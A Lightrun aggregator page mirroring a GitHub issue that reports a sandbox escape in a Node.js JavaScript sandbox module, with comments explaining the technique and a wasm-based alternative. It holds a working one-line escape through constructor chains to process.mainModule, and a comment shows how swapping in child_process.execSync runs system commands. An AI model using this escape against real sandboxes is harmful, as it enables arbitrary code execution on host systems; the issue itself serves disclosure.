question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Sandbox can be broken.

See original GitHub issue

Using functions and constructors, its possible to escape the sandbox to get process, which can be used to get require that can be used for evil things like a reverse shell.

Code: new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi") A, I hope, more readable (because of how hacky the thing is its difficult) version:

new Function("
  return (
    this.constructor.constructor('
      return (this.process.mainModule.constructor._load
     )'
    )())"
  )()
("util").inspect("hi")

Issue Analytics

  • State:open
  • Created 7 years ago
  • Reactions:4
  • Comments:18 (1 by maintainers)

github_iconTop GitHub Comments

4reactions
gf3commented, Jul 23, 2020

i’ve been playing with compiling a javascript engine to wasm, which seems to be a good way to execute javascript securely:

Screencast

and here’s the code example from the initial issue:

Screenshot from 2020-07-23 17-40-01

4reactions
io4commented, Nov 5, 2017

@sand1er the code does the following:

  • Escape the context by using constructors, because the objects still have constructors you can use to go out, because the constructor of this is Object and the constructor of Object is Function, you can use that Function to make a function that runs in a new context that has the process variable

  • Use process variable to access require-like function (process.mainModule’s constructor is module that has _load which can do things similar )

  • Imports a module and runs commands. The example just imports utils and inspects "hi"

Buy you could run commands by replacing ("util").inspect("hi") with ("child_process").execSync("id") for example (to run the command id)

You should think new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")() as require.

I found a very similar thing in another major sandbox (sandcastle) https://github.com/bcoe/sandcastle/issues/70 hopefully all the people who download this modules don’t use it for production or something. I basically ended up making my own sandbox… (which I don’t want to advertise here)

Feel free to ask more questions if you don’t understand something.

Read more comments on GitHub >

github_iconTop Results From Across the Web

How to reinstall a broken sandbox - CloudBlue
CloudBlue · Question · Answer · Note that your sandbox will be destroyed and then redeployed from scratch and all data stored in...
Read more >
[Bug on PC] Sandbox mode seems to be broken - Reddit
So I just finished the campain and thought I would try some sandbox. I encountered two major bugs : - When I started...
Read more >
Does anything have an ability to break out of the sandbox?
Yes, you can definitely cause harm from a sandbox, especially in a full sandbox. You could trigger an integration with sandbox data, ...
Read more >
Help window sandbox broken not load up after I run virus!
This thread is locked. You can follow the question or vote as helpful, but you cannot reply to this thread. I have the...
Read more >
Sandbox testing broken in iOS 11 | Apple Developer Forums
Thanks for the tip, PBK. I did not think the testing process would be much different when using TestFlight, but it sounds like...
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found